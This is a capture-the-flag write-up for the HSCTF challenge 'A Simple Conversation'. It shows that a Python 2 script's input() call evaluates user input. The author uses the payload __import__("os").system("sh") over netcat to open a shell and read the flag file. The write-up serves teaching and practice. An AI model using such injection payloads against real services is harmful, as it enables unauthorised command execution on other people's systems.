Tags: miscellaneous 

Rating: 5.0

# A Simple Conversation

```
Someone on the internet wants to talk to you. Can you find out what they want?

nc misc.hsctf.com 9001
```

(File(s): attachments/talk.py)

We're talking to a Python script listening on a port of a server. A typical conversation would look like this:

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> 18
Wow!
Sometimes I wish I was 18
Well, it was nice meeting you, 18-year-old.
Goodbye!
```

Let's see what happens when we enter a non-numeric input.

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> abc
Traceback (most recent call last):
File "talk.py", line 18, in <module>
age = input("> ")
File "<string>", line 1, in <module>
NameError: name 'abc' is not defined
```

Looks like we've found a code injection vulnerability in the script. Let's verify this code injection vulnerability by trying to list the variables in the program.

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> vars()
Wow!
Sometimes I wish I was {'__builtins__': <module '__builtin__' (built-in)>, '__file__': 'talk.py', '__package__': None, 'age': {...}, 'sleep': <built-in function sleep>, '__name__': '__main__', '__doc__': None}
Well, it was nice meeting you, {'__builtins__': <module '__builtin__' (built-in)>, '__file__': 'talk.py', '__package__': None, 'age': {...}, 'sleep': <built-in function sleep>, '__name__': '__main__', '__doc__': None}-year-old.
Goodbye!
```

Awesome. Looks like we've found the solution. Let's spawn a shell.

```
$ nc misc.hsctf.com 9001
Hello!
Hey, can you help me out real quick.
I need to know your age.
What's your age?
> __import__("os").system("sh")
ls
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
talk.py
tmp
usr
var
cat flag.txt
hsctf{plz_u5e_pyth0n_3}
```